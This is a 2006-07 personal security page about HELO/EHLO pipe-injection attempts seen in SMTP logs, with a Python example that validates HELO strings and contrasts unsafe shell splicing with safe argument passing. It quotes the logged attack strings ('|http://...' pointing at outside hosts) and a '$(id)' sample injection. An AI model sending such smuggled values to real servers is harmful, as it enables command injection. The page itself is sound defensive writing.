
SMTP HELO/EHLO Pipe/Program Attacks


An example of what is likely an exploit attempt against insufficiently careful SMTP servers has been showing up repeatedly in my own server logs:

2006-11-... rblsmtpd: [pid] EHLO "|http://mail.oldartero.com:8889/cgi-bin/put"
2006-11-... rblsmtpd: [pid] HELO "|http://mail.oldartero.com:8889/cgi-bin/put"

(Note that I've patched my version of rblsmtpd to log things like HELO strings, among other things.)

More recently I've been seeing:

2007-01-... rblsmtpd: 17051 EHLO "|http://esunhuitionkdefunhsadwa.com:8888/cgi-bin/put.cgi"
2007-01-... rblsmtpd: 17051 HELO "|http://esunhuitionkdefunhsadwa.com:8888/cgi-bin/put.cgi"

Note the vertical bar at the beginning of the HELO/EHLO strings provided by the SMTP client (which surely intends to inject spam or vermin into my system, and would have, had it not been blocked by one of the RBLs I use).

In another context, a leading vertical bar means "pipe the data to the program named after the bar", and here the "program" is a URL for a server that is perhaps set up to record whatever data gets piped to it. But that only works if the underlying system offers such a feature, which Unix and its variants do, and if the SMTP server (or a script that later processes its logs) fails to tag or validate the string before exposing it to the underlying system's flexibility and power.

(Normally, a HELO/EHLO request specifies a unique name for an SMTP client, usually one of the host or server names on whose behalf it is acting. Mine uses "theburleys.net" at the moment. Originally, this was designed to help prevent mail loops. These days, many SMTP servers analyze this "unique name" provided by an SMTP client in order to try to decide whether the client is legitimate: for example, since it is usually an FQDN, it will probably have at least one period (dot) if the client is legitimate.)

Spammers and vermin authors are unlikely to have tried this technique without first learning that some SMTP servers (or their log-analysis scripts), perhaps in their zeal to determine the legitimacy of the client, use the "unique name" in a fashion that amounts to trusting it not to name a pipe to a program or URL.

(I'm a bit unclear as to how this exploit would actually work in a typical Unix shell environment, since Unix shells don't normally recognize URLs as legitimate program names. Perhaps Perl's "open" function or PHP is involved?)

SMTP server administrators should therefore double-check that whatever scripts they use to validate HELO strings (during the SMTP session or later when examining SMTP logs) treat those strings as utterly untrustworthy: never splice them into a shell command line or hand them to an API that interprets a leading bar or other metacharacters, and accept only what the HELO grammar allows, a domain name or a bracketed address literal, rejecting or quarantining everything else.
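The following is an added example of such a check; it is not the author's patched rblsmtpd nor code from any project. It parses log lines in the format quoted above (the sample data is constructed, with made-up dates and pids), validates each HELO/EHLO argument against the RFC 5321 grammar, flags the pipe-prefix and shell-metacharacter cases, and contrasts the careless way of handing the string to an external command (a shell command line, or equivalently the two-argument form of Perl's open, which does treat a leading "|" as "pipe to this command") with the safe way (a single argv element, no shell). The "host" lookup command and the verdict labels are assumptions chosen for illustration.

```python
"""Treat HELO/EHLO strings as untrusted input (added example, not the page's code)."""
import ipaddress
import re

# Constructed sample log, in the format of the rblsmtpd lines quoted on this
# page. Dates and pids are made up; the two URLs are the ones from the page.
SAMPLE_LOG = """\
2006-11-01 rblsmtpd: 4242 EHLO "|http://mail.oldartero.com:8889/cgi-bin/put"
2006-11-01 rblsmtpd: 4242 HELO "|http://mail.oldartero.com:8889/cgi-bin/put"
2007-01-02 rblsmtpd: 17051 EHLO "|http://esunhuitionkdefunhsadwa.com:8888/cgi-bin/put.cgi"
2007-01-02 rblsmtpd: 17052 EHLO "mail.example.net"
2007-01-02 rblsmtpd: 17053 HELO "[192.0.2.25]"
2007-01-02 rblsmtpd: 17054 EHLO "localhost"
2007-01-02 rblsmtpd: 17055 HELO "$(id)"
"""

# <date> rblsmtpd: <pid> HELO|EHLO "<argument>"
LOG_RE = re.compile(r'^\S+ rblsmtpd: (\d+) (HELO|EHLO) "(.*)"$')

# RFC 5321 section 4.1.2: Domain = sub-domain *("." sub-domain); a sub-domain
# is letters/digits with interior hyphens. The 63-octet label limit is RFC 1035.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DOMAIN_RE = re.compile(rf"^{LABEL}(?:\.{LABEL})*$")
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_LITERAL_RE = re.compile(rf"^\[{OCTET}(?:\.{OCTET}){{3}}\]$")

# Characters a POSIX shell, Perl's two-argument open(), or similar would
# interpret. A valid HELO argument never contains any of them except the
# brackets of an address literal, which is why validity is checked first.
SHELL_META = set("|&;<>()$`\\\"'*?[]#~= \t\n{}!")


def is_valid_helo(arg):
    """True iff arg is a syntactically valid HELO/EHLO argument."""
    if not arg or len(arg) > 255:
        return False
    if DOMAIN_RE.match(arg) or IPV4_LITERAL_RE.match(arg):
        return True
    if arg.startswith("[IPv6:") and arg.endswith("]"):
        try:
            ipaddress.IPv6Address(arg[len("[IPv6:"):-1])
            return True
        except ValueError:
            return False
    return False


def classify(arg):
    """Assign an (assumed, illustrative) verdict label to a HELO argument."""
    if is_valid_helo(arg):
        # Valid grammar, but a bare label with no dot is the heuristic the
        # page mentions: legitimate clients almost always send an FQDN.
        return "valid" if "." in arg or arg.startswith("[") else "valid-no-dot"
    if arg.startswith("|"):
        return "pipe-prefix"  # the case seen in the logs above
    if any(c in SHELL_META for c in arg):
        return "shell-metachars"
    return "malformed"


def parse_helo_log(text):
    """Yield (pid, verb, argument) for each HELO/EHLO line in the log."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield int(m.group(1)), m.group(2), m.group(3)


def audit(text):
    """Classify every HELO/EHLO argument found in a log."""
    return [(pid, verb, arg, classify(arg)) for pid, verb, arg in parse_helo_log(text)]


def naive_shell_command(helo):
    """The mistake: splicing the raw string into a command line.

    With helo = '|http://.../cgi-bin/put', sh -c receives the text
    'host |http://.../cgi-bin/put', which the shell parses as a pipeline whose
    second stage is whatever the attacker named. Perl's open(FH, "|$helo")
    makes the same move. Returned as a string for illustration; never run here.
    """
    return "host " + helo


def lookup_argv(helo):
    """The fix: validate first, then pass the string as one argv element.

    subprocess.run(lookup_argv(helo)) would execute 'host' directly, with no
    shell, so a leading '|' or a '$(...)' is just bytes in argv[1], not syntax.
    """
    if not is_valid_helo(helo):
        raise ValueError("refusing to pass untrusted HELO argument to a command: %r" % helo)
    return ["host", helo]


if __name__ == "__main__":
    for pid, verb, arg, verdict in audit(SAMPLE_LOG):
        print(f"{pid:>6} {verb} {verdict:16} {arg}")
```

The grammar check is deliberately strict: anything that is not a domain name or an address literal is rejected before it reaches any external program, so the question of which shell or library would honour the leading bar never arises.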


Back to my "hostile environments" page.


Copyright (C) 2006 James Craig Burley, Software Craftsperson
Last modified on 2007-07-10.